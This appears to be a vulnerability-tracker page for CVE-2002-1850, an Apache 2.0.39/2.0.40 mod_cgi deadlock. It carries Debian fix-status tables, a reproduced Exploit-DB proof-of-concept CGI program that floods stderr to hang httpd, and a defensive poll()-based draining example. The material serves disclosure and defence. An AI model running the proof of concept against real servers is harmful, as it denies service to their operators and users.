CVE-2002-1850
Description
mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script.
CVE-2002-1850
| Name | CVE-2002-1850 |
| Description | mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script. |
| Source | CVE (at NVD; CERT, ENISA, LWN, oss-sec, fulldisc, Debian ELTS, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, GitHub advisories/code/issues, web search, more) |
Vulnerable and fixed packages
The table below lists information on source packages.
| Source Package | Release | Version | Status |
|---|---|---|---|
| apache2 (PTS) | bullseye | 2.4.62-1~deb11u1 | fixed |
| | bullseye (security) | 2.4.67-1~deb11u1 | fixed |
| | bookworm, bookworm (security) | 2.4.67-1~deb12u2 | fixed |
| | trixie (security), trixie | 2.4.67-1~deb13u2 | fixed |
| | forky | 2.4.67-1 | fixed |
| | sid | 2.4.67-2 | fixed |
The information below is based on the following data on fixed versions.
| Package | Type | Release | Fixed Version | Urgency | Origin | Debian Bugs |
|---|---|---|---|---|---|---|
| apache2 | source | (unstable) | 2.0.42-1 | | | |
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Apache 2.0.39/40 - Oversized STDERR Buffer Denial of Service
// source: https://www.securityfocus.com/bid/5787/info
Apache is prone to a denial of service condition when an excessive amount of data is written to stderr. This condition reportedly occurs when the amount of data written to stderr is over the default amount allowed by the operating system.
This may potentially be an issue in web applications that write user-supplied data to stderr. Additionally, locally based attackers may exploit this issue.
This issue has been confirmed in Apache 2.0.39/2.0.40 on Linux operating systems. Apache on other platforms may also be affected. This issue does not appear to be present in versions prior to 2.0.x.
// Credit to: K.C. Wong
```c
#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <time.h>
#include <unistd.h>
#include <fcntl.h>

#define SIZE 4075

/* Write a short line and then one oversized line to stderr. */
void out_err()
{
    char buffer[SIZE];
    int i = 0;

    /* Fill the buffer with a repeating a..z pattern. */
    for (i = 0; i < SIZE - 1; ++i)
        buffer[i] = 'a' + (char)(i % 26);
    buffer[SIZE - 1] = '\0';

    /* Put stderr (fd 2) into non-blocking mode. */
    fcntl(2, F_SETFL, fcntl(2, F_GETFL) | O_NONBLOCK);
    fprintf(stderr, "short test\n");
    fflush(stderr);
    fprintf(stderr, "test error=%s\n", buffer);
    fflush(stderr);
} // out_err()

int main(int argc, char ** argv)
{
    /* CGI header block first, then the stderr output, then the HTML body. */
    fprintf(stdout, "Content-Type: text/html\r\n");
    fprintf(stdout, "\r\n\r\n");
    out_err();
    fprintf(stdout, "<HTML>\n");
    fprintf(stdout, "<body>\n");
    fprintf(stdout, "<h1>hello world</h1>\n");
    fprintf(stdout, "</body>\n");
    fprintf(stdout, "</HTML>\n");
    fflush(stdout);
    exit(0);
} // main()
```
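The deadlock described above comes down to a parent that waits on one pipe while the child is blocked writing to the other. The following is an added example, not code from the advisory, Exploit-DB or Apache: a parent that drains a child's stdout and stderr together with poll(), so a child that floods stderr still runs to completion. The names `noisy_child` and `run_drained` and the 1 MiB size are assumptions made for the illustration.

```c
#include <poll.h>
#include <sys/wait.h>
#include <unistd.h>
/* Constructed stand-in for a CGI: floods stderr, then writes 6 bytes to stdout. */
static void noisy_child(size_t err_bytes)
{
    char chunk[4096] = {0};
    while (err_bytes > 0) {
        ssize_t w = write(2, chunk, err_bytes < sizeof chunk ? err_bytes : sizeof chunk);
        if (w <= 0) _exit(1);
        err_bytes -= (size_t)w;
    }
    _exit(write(1, "hello\n", 6) == 6 ? 0 : 1);
}

/* Hypothetical helper: drain both pipes together; returns child exit status or -1. */
int run_drained(size_t err_bytes, size_t *out_len, size_t *err_len)
{
    int out[2], err[2], status, open_fds = 2;
    char buf[4096];
    if (pipe(out) < 0 || pipe(err) < 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {                      /* child: the pipes become fd 1 and fd 2 */
        dup2(out[1], 1); dup2(err[1], 2);
        close(out[0]); close(out[1]); close(err[0]); close(err[1]);
        noisy_child(err_bytes);          /* never returns */
    }
    close(out[1]); close(err[1]);        /* parent keeps only the read ends */
    struct pollfd fds[2] = { { out[0], POLLIN, 0 }, { err[0], POLLIN, 0 } };
    size_t *len[2] = { out_len, err_len };
    *out_len = *err_len = 0;
    while (open_fds > 0) {               /* service whichever pipe is ready */
        if (poll(fds, 2, -1) < 0) return -1;
        for (int i = 0; i < 2; i++) {
            if (!(fds[i].revents & (POLLIN | POLLHUP | POLLERR))) continue;
            ssize_t r = read(fds[i].fd, buf, sizeof buf);
            if (r > 0) { *len[i] += (size_t)r; continue; }
            close(fds[i].fd); fds[i].fd = -1; open_fds--;  /* EOF or error; poll skips fd -1 */
        }
    }
    return (waitpid(pid, &status, 0) == pid && WIFEXITED(status)) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    size_t out_len, err_len;
    return run_drained((size_t)1 << 20, &out_len, &err_len);  /* 0: child finished */
}
```

A parent that instead reads stdout to end-of-file before touching stderr would block as soon as the child filled the stderr pipe.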
OS impact
Debian Fixed 5 releases
| Version | Status | Fixed in |
|---|---|---|
| trixie | Fixed | 2.0.42-1 |
| sid | Fixed | 2.0.42-1 |
| forky | Fixed | 2.0.42-1 |
| bullseye | Fixed | 2.0.42-1 |
| bookworm | Fixed | 2.0.42-1 |